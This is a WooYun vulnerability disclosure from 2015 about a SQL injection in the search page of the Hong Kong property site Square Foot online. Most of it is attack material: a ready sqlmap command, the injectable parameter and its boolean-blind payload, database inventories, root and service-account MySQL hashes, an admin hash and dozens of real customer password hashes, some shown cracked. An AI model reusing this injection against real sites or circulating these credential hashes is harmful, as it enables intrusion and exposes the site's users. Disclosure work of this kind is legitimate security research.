Square Foot online某處存在SQL插入攻擊（DBA權限；root密碼泄露；數千萬條網站記錄泄露；大量用戶密碼泄露）（香港地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153452

漏洞标题：Square Foot online某處存在SQL插入攻擊（DBA權限；root密碼泄露；數千萬條網站記錄泄露；大量用戶密碼泄露）（香港地區）

漏洞作者：路人甲

提交时间：2015-11-11 10:10

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-11：细节已通知厂商并且等待厂商处理中
2015-11-20：厂商已经确认，细节仅向厂商公开
2015-11-30：细节向核心白帽子及相关领域专家公开
2015-12-10：细节向普通白帽子公开
2015-12-20：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

Square Foot online is an independent website, promoting and showcasing properties for sale and rent from Hong Kong's leading independent real estate agents. The aim of squarefoot.com.hk is to ensure that a property is given the most effective exposure to sell or let as quickly as possible, using a coherent and user friendly online platform.
The website is home to the leading industry real estate agents, who actively upload their property listings in the Hong Kong and international property sections. The property listings are regularly monitored to ensure that the end user is privy to the most up to date and accurate database of properties available in this market.
squarefoot.com.hk is a leading media brand in Hong Kong that focuses on all property related matters, and targeted towards the English-reading population of Hong Kong, both expatriate and Asian.
If you are selling or letting your home, ask your property agent to advertise your property on squarefoot.com.hk. It's convenient, easy-to-use and an effective means to display your property to a mass audience, both inside and outside of Hong Kong.
If you are interested in advertising on our website, please contact us for our competitive rates and more information on +852 3965 4300 or email [email protected].
In addition, we welcome any feedback that you may have to help us constantly improve our site. Thank you.
Read more at http://www.squarefoot.com.hk/section/about-us/#I31PrcIxGfytVlV3.99

详细说明：

地址：http://**.**.**.**/chinese-hk/serviced-apartments/?area=1&districts[]=95&rent_min=&rent_max=&size_min=&size_max=&keyword=&search=%E6%90%9C%E5%B0%8B

python sqlmap.py -u "http://**.**.**.**/chinese-hk/serviced-apartments/?area=1&districts[]=95&rent_min=&rent_max=&size_min=&size_max=&keyword=&search=%E6%90%9C%E5%B0%8B" -p districts[] --technique=BT --random-agent --batch --count --search -C pass

Database: sf-www
+-----------------------------------------------+---------+
| Table                                         | Entries |
+-----------------------------------------------+---------+
| sqft_xml_record_detail                        | 39164263 |
| sqft_xml_record                               | 24016093 |

漏洞证明：

---
Parameter: districts[] (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: area=1&districts[]=95) AND 3345=3345 AND (3668=3668&rent_min=&rent_max=&size_min=&size_max=&keyword=&search=%E6%90%9C%E5%B0%8B
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL >= 5.0.0
current user:    'sf-www@%'
current user is DBA:    True
database management system users [4]:
[*] 'munin'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'sf-www'@'%'
database management system users password hashes:
[*] munin [1]:
    password hash: *95D29F091A8FA51345E5507E3FDF2BBCFF3E619D
[*] root [1]:
    password hash: *DF8B6D01CDC2E63465E13927EF6317CFCF370863
[*] sf-www [1]:
    password hash: *8D6D4EA7D1D87A779624A0324EB15169D4B17A8B
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: districts[] (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: area=1&districts[]=95) AND 3345=3345 AND (3668=3668&rent_min=&rent_max=&size_min=&size_max=&keyword=&search=%E6%90%9C%E5%B0%8B
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5
Database: sf-disable
+-----------------------------------------------+---------+
| Table                                         | Entries |
+-----------------------------------------------+---------+
| sqft_properties                               | 106626  |
+-----------------------------------------------+---------+
Database: designidea
+-----------------------------------------------+---------+
| Table                                         | Entries |
+-----------------------------------------------+---------+
| image_tags                                    | 11544   |
| sqft_image_upload_tmp                         | 3616    |
| images                                        | 2875    |
| project_tags                                  | 1366    |
| images20140825                                | 1138    |
| sqft_news                                     | 557     |
| customers_sessions                            | 331     |
| configuration                                 | 261     |
| countries                                     | 239     |
| sessions                                      | 236     |
| project                                       | 185     |
| zones                                         | 181     |
| products_description                          | 84      |
| sqft_news_20141016                            | 73      |
| categories_description                        | 63      |
| customers                                     | 48      |
| action_recorder                               | 40      |
| products_options_values                       | 33      |
| manufacturers_info                            | 30      |
| contact_history                               | 29      |
| project_tag_categories                        | 29      |
| products                                      | 28      |
| products_to_categories                        | 28      |
| images_tag_categories                         | 27      |
| categories                                    | 21      |
| customers_favourites                          | 21      |
| district                                      | 18      |
| configuration_group                           | 15      |
| products_options                              | 15      |
| products_attributes                           | 13      |
| sec_directory_whitelist                       | 13      |
| orders_status                                 | 12      |
| products_options_values_to_products_options   | 11      |
| manufacturers                                 | 10      |
| tag_type                                      | 10      |
| profile_type                                  | 8       |
| address_format                                | 5       |
| products_images                               | 4       |
| specials                                      | 4       |
| languages                                     | 3       |
| currencies                                    | 2       |
| administrators                                | 1       |
| banners                                       | 1       |
| banners_history                               | 1       |
| counter                                       | 1       |
| geo_zones                                     | 1       |
| products_attributes_download                  | 1       |
| reviews                                       | 1       |
| reviews_description                           | 1       |
| tax_class                                     | 1       |
| tax_rates                                     | 1       |
| whos_online                                   | 1       |
| zones_to_geo_zones                            | 1       |
+-----------------------------------------------+---------+
Database: performance_schema
+-----------------------------------------------+---------+
| Table                                         | Entries |
+-----------------------------------------------+---------+
| setup_consumers                               | 8       |
| performance_timers                            | 5       |
| setup_timers                                  | 1       |
+-----------------------------------------------+---------+
Database: sf-www-20150616
+-----------------------------------------------+---------+
| Table                                         | Entries |
+-----------------------------------------------+---------+
| sqft_buildings_20150616                       | 19914   |
+-----------------------------------------------+---------+
Database: mysql
+-----------------------------------------------+---------+
| Table                                         | Entries |
+-----------------------------------------------+---------+
| help_relation                                 | 1009    |
| help_topic                                    | 510     |
| help_keyword                                  | 453     |
| help_category                                 | 40      |
| `user`                                        | 4       |
| db                                            | 1       |
| proc                                          | 1       |
| proxies_priv                                  | 1       |
+-----------------------------------------------+---------+
Database: sf-www
+-----------------------------------------------+---------+
| Table                                         | Entries |
+-----------------------------------------------+---------+
| sqft_xml_record_detail                        | 39164263 |
| sqft_xml_record                               | 24016093 |
| sqft_addresses_20130822                       | 4086808 |
| sqft_addresses                                | 3477077 |
| sqft_user_histories                           | 2697923 |
| sqft_properties_features                      | 2415272 |
| phpbb_sessions                                | 2014661 |
| sqft_wong                                     | 1383214 |
| sqft_wong_20151006                            | 1380016 |
| sqft_wong_20150520                            | 1319189 |
| sqft_wong2                                    | 1319122 |
| sqft_wong_live2                               | 1305379 |
| sqft_wong_20150504                            | 1298368 |
| phpbb_topics_track                            | 704744  |
| phpbb_topics_watch                            | 686978  |
| sqft_properties_users                         | 621352  |
| sqft_refertofriend                            | 618460  |
| sqft_properties                               | 391997  |
| sqft_contact_history                          | 342559  |
| phpbb_posts                                   | 320877  |
| phpbb_topics_posted                           | 305590  |
| phpbb_topics                                  | 279830  |
| phpbb_user_group                              | 237344  |
| sqft_import_log                               | 176096  |
| phpbb_users                                   | 156278  |
| `phpbb_users.20140924`                        | 151964  |
| report_users                                  | 142148  |
| report_users_emarsys                          | 101945  |
| sqft_overseas_properties                      | 87778   |
| sqft_wong_test1                               | 84846   |
| sqft_wong_test2                               | 79449   |
| sqft_overseas_properties_backup               | 70948   |
| sqft_iphone_users                             | 69542   |
| sqft_properties_upload_img_logs               | 57941   |
| sqft_buildings_matching_20141015              | 42691   |
| sqft_buildings_matching_20141027_b4_update    | 42691   |
| sqft_web_saveprop                             | 34175   |
| sqft_user_csv_formats                         | 31823   |
| sqft_buildings_matching                       | 31163   |
| sqft_buildings_old                            | 31163   |
| sqft_buildings_matching_20140912              | 30332   |
| sqft_buildings_matching_20140924              | 30332   |
| sqft_buildings_matching_20140908              | 30309   |
| pp_iphone_property_stat                       | 28244   |
| sqft_properties_matching                      | 26502   |
| sqft_buildings                                | 20555   |
| sqft_buildings_matching_sqft_to_gohome        | 20543   |
| sqft_buildings_20150908                       | 20532   |
| sqft_buildings_20150714                       | 19960   |
| sqft_buildings_20150622_corrupted             | 19957   |
| sqft_buildings_20150622                       | 19944   |
| sqft_buildings_20150102                       | 19311   |
| sqft_buildings_20141223                       | 19308   |
| sqft_buildings_20141219                       | 19296   |
| sqft_buildings_20141217                       | 19253   |
| phpbb_log                                     | 16867   |
| `sqft_buildings_jack(original)`               | 16500   |
| sqft_buildings_jack_20140904                  | 16037   |
| sqft_prnewswire                               | 14837   |
| phpbb_sessions_keys                           | 13668   |
| gohome_buildings                              | 11007   |
| sqft_buildings_matching_gohome_to_sqft        | 11007   |
| sqft_android_users                            | 10589   |
| sqft_view_report                              | 10467   |
| sqft_web_recent_search                        | 10388   |
| sqft_subscriptions_addedbiglist               | 9477    |
| sqft_web_recentprop                           | 9450    |
| phpbb_banlist                                 | 8420    |
| phpbb_users_login_log                         | 7443    |
| phpbb_privmsgs_to                             | 7100    |
| sqft_subscriptions                            | 6961    |
| sqft_banners_sections                         | 6953    |
| report_subscription_emails                    | 6804    |
| sqft_subscriptions_users                      | 6593    |
| sqft_subscriptions_ericbackup                 | 6589    |
| sqft_buildings_change_log                     | 6578    |
| sqft_unsubscription_history                   | 5900    |
| sqft_iphone_monthly_district_leads_report     | 5024    |
| sqft_audit                                    | 4935    |
| sqft_servicedapartmentlayoutoptions           | 4934    |
| sqft_estate                                   | 4901    |
| sqft_premiere_track                           | 4683    |
| phpbb_forums_track                            | 4550    |
| sqft_haunted                                  | 4216    |
| oasis_iphone_property_stat                    | 4053    |
| phpbb_confirm                                 | 4005    |
| sqft_emailalert                               | 3820    |
| phpbb_privmsgs                                | 3563    |
| sqft_android_monthly_district_leads_report    | 3132    |
| sqft_listinghistory                           | 2444    |
| sqft_consultancy_agents_promo_codes           | 2299    |
| sqft_users                                    | 2284    |
| sqft_iphone_total_page_view                   | 2271    |
| sqft_users20140729                            | 2116    |
| pp_iphone_users                               | 2021    |
| sqft_users_20131230                           | 1909    |
| sqft_the_space_video_click_record             | 1789    |
| sqft_sections                                 | 1772    |
| sqft_buildings_add_requests                   | 1712    |
| sqft_iphone_stat                              | 1687    |
| sqft_banners                                  | 1641    |
| sqft_copy_image                               | 1601    |
| pp_iphone_stat                                | 1489    |
| sqft_web_save                                 | 1464    |
| sqft_iphone_banners_details                   | 1414    |
| sqft_android_banners_details                  | 1411    |
| sqft_buildings_add_requests_property_listings | 1407    |
| sqft_vote2015_voter                           | 1247    |
| sqft_vote2015_voter_option                    | 1247    |
| sqft_users_backup                             | 1233    |
| phpbb_bookmarks                               | 1170    |
| oasis_iphone_stat                             | 1092    |
| sqft_vote2014_voter                           | 985     |
| sqft_vote2014_voter_option                    | 985     |
| sqft_banners_backup                           | 983     |
| sqft_android_stat                             | 923     |
| sqft_android_total_page_view                  | 841     |
| sqft_user_plans                               | 801     |
| sqft_the_space_life_style                     | 782     |
| sqft_school_kindergarten                      | 735     |
| sqft_news                                     | 712     |
| sqft_month_report                             | 684     |
| sqft_newdevelopment_news_nw_link              | 569     |
| sqft_newdevelopment_news_nw                   | 548     |
| sqft_buildings_add_requests_20141120          | 540     |
| sqft_newdevelopment_news_nw_bkup              | 539     |
| sqft_school_primary                           | 501     |
| sqft_premiere                                 | 484     |
| oasis_iphone_users                            | 457     |
| sqft_school_secondary                         | 457     |
| phpbb_users_info                              | 450     |
| sqft_users_districts                          | 449     |
| oncc_report_uid                               | 414     |
| phpbb_acl_roles_data                          | 395     |
| sqft_vote2013_voter_option                    | 395     |
| sqft_vote2013_voter                           | 354     |
| phpbb_users_reset_password                    | 350     |
| sqft_servicedapartments_options               | 344     |
| phpbb_acl_groups                              | 334     |
| sqft_mod_ap_addresses                         | 314     |
| sqft_buildings_deleted_records                | 295     |
| phpbb_config                                  | 262     |
| sqft_news_backup                              | 249     |
| sqft_countries                                | 243     |
| sqft_vote2012_voter_option                    | 243     |
| sqft_nationalities                            | 240     |
| sqft_random_find_an_agent                     | 240     |
| sqft_vote2012_voter                           | 234     |
| sqft_users_exclude                            | 225     |
| pp_iphone_total_page_view                     | 215     |
| sqft_newdevelopment                           | 207     |
| phpbb_modules                                 | 199     |
| sqft_user_csv_translations                    | 181     |
| sqft_servicedapartments                       | 179     |
| sqft_bannergroups                             | 177     |
| sqft_consultancy_agents_orders_districts      | 173     |
| sqft_groups_permissions                       | 162     |
| sqft_vote_dev                                 | 158     |
| sqft_school_international                     | 154     |
| sqft_servicedapartmentlayouts                 | 150     |
| sqft_catagories_companies                     | 149     |
| sqft_companies                                | 149     |
| sqft_iphone_monthly_report                    | 144     |
| sqft_wong_deleted_records                     | 134     |
| sqft_translates                               | 125     |
| sqft_translates_backup                        | 125     |
| sqft_web_footer                               | 123     |
| oasis_iphone_total_page_view                  | 122     |
| sqft_vote_2010                                | 119     |
| phpbb_acl_options                             | 117     |
| sqft_districts                                | 106     |
| sqft_districts_backup                         | 101     |
| sqft_vote                                     | 101     |
| sqft_districts_20141223                       | 100     |
| sqft_servicedapartments_users                 | 99      |
| gohome_districts                              | 95      |
| sqft_internationals_users                     | 92      |
| sqft_user_csv_translations1                   | 91      |
| gohome_buildings_matching_log                 | 85      |
| phpbb_poll_options                            | 83      |
| sqft_newdeveloper                             | 80      |
| sqft_random_properties                        | 80      |
| sqft_internationals                           | 76      |
| sqft_features                                 | 72      |
| sqft_bannerlayouts                            | 71      |
| sqft_survey2011                               | 69      |
| sqft_vote2014_nominee                         | 69      |
| sqft_c21book                                  | 68      |
| sqft_ppsurvery                                | 67      |
| phpbb_extensions                              | 66      |
| phpbb_profile_fields_data                     | 66      |
| sqft_developments_new                         | 61      |
| sqft_permissions                              | 61      |
| sqft_updates                                  | 60      |
| sqft_vote2015_nominee                         | 60      |
| sqft_vote2015_nominee1                        | 60      |
| sqft_refer5friend                             | 58      |
| sqft_developments_users                       | 57      |
| sqft_transactions_estate_cache                | 53      |
| sqft_transactions_district_cache              | 51      |
| phpbb_bots                                    | 50      |
| pp_iphone_monthly_report                      | 48      |
| sqft_developments                             | 48      |
| oasis_iphone_monthly_report                   | 46      |
| sqft_catagories                               | 44      |
| sqft_the_space_author                         | 44      |
| sqft_android_monthly_report                   | 43      |
| sqft_properties_approval                      | 43      |
| phpbb_smilies                                 | 42      |
| sqft_district_leader_users                    | 40      |
| sqft_findingevent                             | 39      |
| sqft_user_jobs                                | 37      |
| phpbb_forums                                  | 36      |
| sqft_banners_liv_group                        | 35      |
| sqft_banners_elite                            | 31      |
| sqft_fengshui                                 | 29      |
| sqft_the_space                                | 28      |
| sqft_sclipboard                               | 26      |
| sqft_suspend_account_log                      | 26      |
| sqft_consultancy_agents                       | 25      |
| sqft_newdevelopment_news                      | 25      |
| phpbb_acl_roles                               | 24      |
| sqft_android_banners                          | 24      |
| sqft_iphone_banners                           | 24      |
| sqft_user_cities                              | 24      |
| sqft_vote2014_category                        | 23      |
| phpbb_drafts                                  | 22      |
| sqft_avignon                                  | 22      |
| sqft_the_space_section                        | 22      |
| sqft_layouts                                  | 21      |
| sqft_overseas_properties_search_region        | 21      |
| sqft_vote2015_category                        | 20      |
| sqft_banners_prime_miami                      | 19      |
| sqft_catagories_sponsors                      | 19      |
| sqft_properties_last_old_record               | 18      |
| sqft_school_districts                         | 18      |
| sqft_updates_sections                         | 17      |
| sqft_aastock                                  | 16      |
| sqft_transactions_new_home_cache              | 15      |
| sqft_fengshui_test                            | 13      |
| sqft_articles                                 | 12      |
| pp_iphone_branch_list                         | 11      |
| sqft_banners_cbre                             | 11      |
| sqft_banners_henry_wiltshire                  | 11      |
| sqft_banners_richmonts                        | 11      |
| sqft_banners_starfish                         | 11      |
| sqft_banners_tclhk_luxury_projects_miami      | 11      |
| sqft_web_users                                | 11      |
| phpbb_icons                                   | 10      |
| sqft_banners_citylife                         | 10      |
| sqft_currencies                               | 10      |
| sqft_hamptons                                 | 10      |
| sqft_overseas_properties_type                 | 10      |
| phpbb_extension_groups                        | 9       |
| sqft_banners_city_lcp2                        | 9       |
| sqft_banners_westbank                         | 9       |
| sqft_consultancy_agents_orders                | 9       |
| sqft_pclipboard                               | 9       |
| sqft_press_release                            | 9       |
| sqft_showcase                                 | 9       |
| sqft_user_income                              | 9       |
| oasis_iphone_agent_list                       | 7       |
| phpbb_groups                                  | 7       |
| sqft_audit_action                             | 7       |
| sqft_featuregroups                            | 7       |
| phpbb_profile_fields_lang                     | 6       |
| pp_iphone_sole_agent_properties               | 6       |
| sqft_banners_chined_international             | 6       |
| sqft_buildings_testing                        | 6       |
| sqft_audit_section                            | 5       |
| sqft_developers                               | 5       |
| sqft_plans                                    | 5       |
| sqft_search_alert                             | 5       |
| sqft_servicedapartmentspecialfeatures         | 5       |
| phpbb_reports_reasons                         | 4       |
| sqft_android_email                            | 4       |
| sqft_banners_bacc_lead                        | 4       |
| sqft_banners_meridien_group                   | 4       |
| sqft_banners_sumitomo_lcp3                    | 4       |
| sqft_banners_tcl_lcp                          | 4       |
| sqft_contacts                                 | 4       |
| sqft_fengshui_section                         | 4       |
| sqft_groups                                   | 4       |
| sqft_iphone_email                             | 4       |
| sqft_overseas_product_type                    | 4       |
| sqft_transaction_region_cache                 | 4       |
| `table`                                       | 3       |
| phpbb_attachments                             | 3       |
| phpbb_lang                                    | 3       |
| phpbb_profile_lang                            | 3       |
| sqft_consultancy_agents_packages              | 3       |
| sqft_hotproperties                            | 3       |
| sqft_internationals_new                       | 3       |
| phpbb_reports                                 | 2       |
| phpbb_zebra                                   | 2       |
| sqft_banners_platinumrise                     | 2       |
| sqft_building_features                        | 2       |
| sqft_properties_exclude                       | 2       |
| sqft_sizeunits                                | 2       |
| sqft_system                                   | 2       |
| oncc_report                                   | 1       |
| phpbb_acl_users                               | 1       |
| phpbb_bbcodes                                 | 1       |
| phpbb_profile_fields                          | 1       |
| phpbb_ranks                                   | 1       |
| phpbb_styles                                  | 1       |
| phpbb_styles_imageset                         | 1       |
| phpbb_styles_theme                            | 1       |
| sqft_consultancy_agents_promo_codes_sets      | 1       |
+-----------------------------------------------+---------+
Database: information_schema
+-----------------------------------------------+---------+
| Table                                         | Entries |
+-----------------------------------------------+---------+
| INNODB_BUFFER_PAGE                            | 655359  |
| INNODB_BUFFER_PAGE_LRU                        | 569523  |
| COLUMNS                                       | 5447    |
| STATISTICS                                    | 1083    |
| KEY_COLUMN_USAGE                              | 541     |
| PARTITIONS                                    | 483     |
| TABLES                                        | 483     |
| TABLE_CONSTRAINTS                             | 441     |
| SESSION_VARIABLES                             | 329     |
| GLOBAL_VARIABLES                              | 317     |
| GLOBAL_STATUS                                 | 312     |
| SESSION_STATUS                                | 312     |
| COLLATION_CHARACTER_SET_APPLICABILITY         | 197     |
| COLLATIONS                                    | 197     |
| USER_PRIVILEGES                               | 86      |
| CHARACTER_SETS                                | 39      |
| PLUGINS                                       | 23      |
| PROCESSLIST                                   | 14      |
| PARAMETERS                                    | 10      |
| ENGINES                                       | 9       |
| SCHEMATA                                      | 7       |
| REFERENTIAL_CONSTRAINTS                       | 6       |
| INNODB_CMP                                    | 5       |
| INNODB_CMP_RESET                              | 5       |
| INNODB_CMPMEM                                 | 5       |
| INNODB_CMPMEM_RESET                           | 5       |
| INNODB_TRX                                    | 4       |
| INNODB_BUFFER_POOL_STATS                      | 1       |
| ROUTINES                                      | 1       |
| SCHEMA_PRIVILEGES                             | 1       |
+-----------------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: designidea
Table: administrators
[1 column]
+---------------+
| Column        |
+---------------+
| user_password |
+---------------+
Database: designidea
Table: customers_info
[2 columns]
+---------------------+
| Column              |
+---------------------+
| password_reset_date |
| password_reset_key  |
+---------------------+
Database: designidea
Table: customers
[1 column]
+--------------------+
| Column             |
+--------------------+
| customers_password |
+--------------------+
Database: sf-www
Table: sqft_users
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: sf-www
Table: phpbb_users
[4 columns]
+-------------------+
| Column            |
+-------------------+
| user_newpasswd    |
| user_pass_convert |
| user_passchg      |
| user_password     |
+-------------------+
Database: sf-www
Table: sqft_subscriptions_users
[1 column]
+---------------+
| Column        |
+---------------+
| user_password |
+---------------+
Database: sf-www
Table: sqft_web_users
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: sf-www
Table: sqft_users_20131230
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: sf-www
Table: report_users_emarsys
[1 column]
+--------------------+
| Column             |
+--------------------+
| password_generated |
+--------------------+
Database: sf-www
Table: sqft_users_backup
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: sf-www
Table: report_users
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: sf-www
Table: phpbb_forums
[1 column]
+----------------+
| Column         |
+----------------+
| forum_password |
+----------------+
Database: sf-www
Table: phpbb_bbcodes
[4 columns]
+---------------------+
| Column              |
+---------------------+
| first_pass_match    |
| first_pass_replace  |
| second_pass_match   |
| second_pass_replace |
+---------------------+
Database: sf-www
Table: phpbb_users.20140924
[4 columns]
+-------------------+
| Column            |
+-------------------+
| user_newpasswd    |
| user_pass_convert |
| user_passchg      |
| user_password     |
+-------------------+
Database: sf-www
Table: sqft_users20140729
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: mysql
Table: user
[1 column]
+----------+
| Column   |
+----------+
| Password |
+----------+
Database: mysql
Table: servers
[1 column]
+----------+
| Column   |
+----------+
| Password |
+----------+
Database: designidea
Table: administrators
[1 entry]
+--------------------------------------------+
| user_password                              |
+--------------------------------------------+
| $P$Ds9UCy52Z4v4Jumj5.JblC8mxjONDX/ (admin) |
+--------------------------------------------+
Database: designidea
Table: customers_info
[0 entries]
+---------------------+--------------------+
| password_reset_date | password_reset_key |
+---------------------+--------------------+
+---------------------+--------------------+
Database: designidea
Table: customers
[48 entries]
+---------------------------------------------+
| customers_password                          |
+---------------------------------------------+
| $P$D/o8qQvZCZ9tDJt.4.1hP7y0iLKmIj1 ()       |
| $P$D2dyynZpjBOEpm.8VG4F4vg/sFaGbf/          |
| $P$D3j7svUUgrthUGy1hYoY0ToLz8c0ve. ()       |
| $P$D3plN5bxafZBCerSq6quMraVPF3Pfd/ (123456) |
| $P$D6ocM896ufcXGtQj6hX9VPNdBEdIay0 (123456) |
| $P$D7nuhjUrh/KYi.0uGOdWCxvE5vO60u.          |
| $P$D80WQuAxp0PqAdo2bnM9XDOwjTWH/O1          |
| $P$D97v0NONt1l5kYjMUT3VGGgokteBKt1          |
| $P$DaGiBt/Swhu3xb.EjQiJvEJRApX.ZQ. ()       |
| $P$DaR01YnT24Lypua1JFT3wm/P.kb8tI1 (123456) |
| $P$DaRyaGoX84cuhdCzC6AebmqG/EcRwY0 ()       |
| $P$DbcH04ByWUemu19G9TqiucFNGQlKrK/ ()       |
| $P$DbcH04ByWUemu19G9TqiucFNGQlKrK/ ()       |
| $P$DcARmxi1jJ0CsNe7Ct1xQ10YjThRaF.          |
| $P$Dd8ALaWPNtUfYlJpTRB9OWTPRENGdd0 ()       |
| $P$DDH.fl2n9tz4WITIc04yV5G2iLdAJQ. (123456) |
| $P$DdKwzesc0K7cQTX3KnLBYE2vIRVXHm/ ()       |
| $P$DEcNvrPy9G86SoYQg8eant/sGU.g7e/          |
| $P$DF9R6ScSqvv8/Lx.ywoojWN2dikZoU1 ()       |
| $P$DgsGNOxkQK6aKAq66EyhHDXu1OnwX00 ()       |
| $P$DKqGhosw2Qi3MCkpMh.48r8VyqSSuZ/          |
| $P$DKudN/aaEW8t/E8MM9hs/mR1oZHOAQ0 (123456) |
| $P$DlbTnul7S/rs6SPNvNPh3ZsEY41PPD0 ()       |
| $P$DldpafhYtpkr4KNzU75KCZR0tWTuUT1          |
| $P$DlITxlqXNPNEm4fziIFdZIqnLrkE3N/ ()       |
| $P$DLO4VXPJwwu/iaM4M184jgkdqh0aO7/          |
| $P$DlTPvreyODI28OU3jHYGxPYXb.tYcM. ()       |
| $P$Dm.RYeZa9fQgMQ3khbNKLDNVy67csx1          |
| $P$Dn66xKZm2MPo9NXH5ubT2j1vVDARkV.          |
| $P$Do9FKQDhnl7ykY7pKpGNp1lX46dzPP/          |
| $P$DofvWL4RIuvYJxlCD80AbJqCjdm1Al1          |
| $P$DOVGE3V1G2yZUmAN3JaDP6MFGWz1cf/          |
| $P$DqAz4x0N9Pb9zXT6Av1RCx/PKkcJbB0 ()       |
| $P$DQBRf450n.gej9rmxiijm8ZuBt/EdN.          |
| $P$DqrxcBfIzUz0OP4JLETYICU/9uI9At1 ()       |
| $P$DS8JyoW5/dzEwEI0RIj49HGJtribau.          |
| $P$DSCRzyTd1aIp0fkS4e/ivj3S4AsP0O0          |
| $P$DSnG6aU48TBiMDBENbexLe0Dvgarz0/          |
| $P$DSzyINeZ/2iuK/MrrmLqXayqIK3fp0/          |
| $P$DU7oKrfz/ynFVm.z0HNAU.flxNwep80          |
| $P$DurOVlhb/FvYX69iP/LJ6/YGohxKOK0 ()       |
| $P$Dux3wRfjhHJRzoTth8g2Yq/ws4HkSw0          |
| $P$DUxWxdrs6ln7y6sNFm/jK6BUInD1tZ0 ()       |
| $P$DVVlSKYF8PrFsLX6y7TDjsALLa3gUp1 ()       |
| $P$DxV75pJSjYi0ouLYhBIcs1qXSJag4g1 (123456) |
| $P$DY.slHKp.cXP/Ql5zbFhdbb12X69FE0          |
| $P$Dywr/WzzhU2VrfqacE4w3vo23FHaRw.          |

修复方案：

上WAF。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2015-11-20 16:24

厂商回复：

已將漏洞報告給網站聯絡人

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153452

漏洞标题：Square Foot online某處存在SQL插入攻擊（DBA權限；root密碼泄露；數千萬條網站記錄泄露；大量用戶密碼泄露）（香港地區）

相关厂商：Square Foot online

漏洞作者：路人甲

提交时间：2015-11-11 10:10

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153452

漏洞标题：Square Foot online某處存在SQL插入攻擊（DBA權限；root密碼泄露；數千萬條網站記錄泄露；大量用戶密碼泄露）（香港地區）

相关厂商：Square Foot online

漏洞作者： 路人甲

提交时间：2015-11-11 10:10

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0153452"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云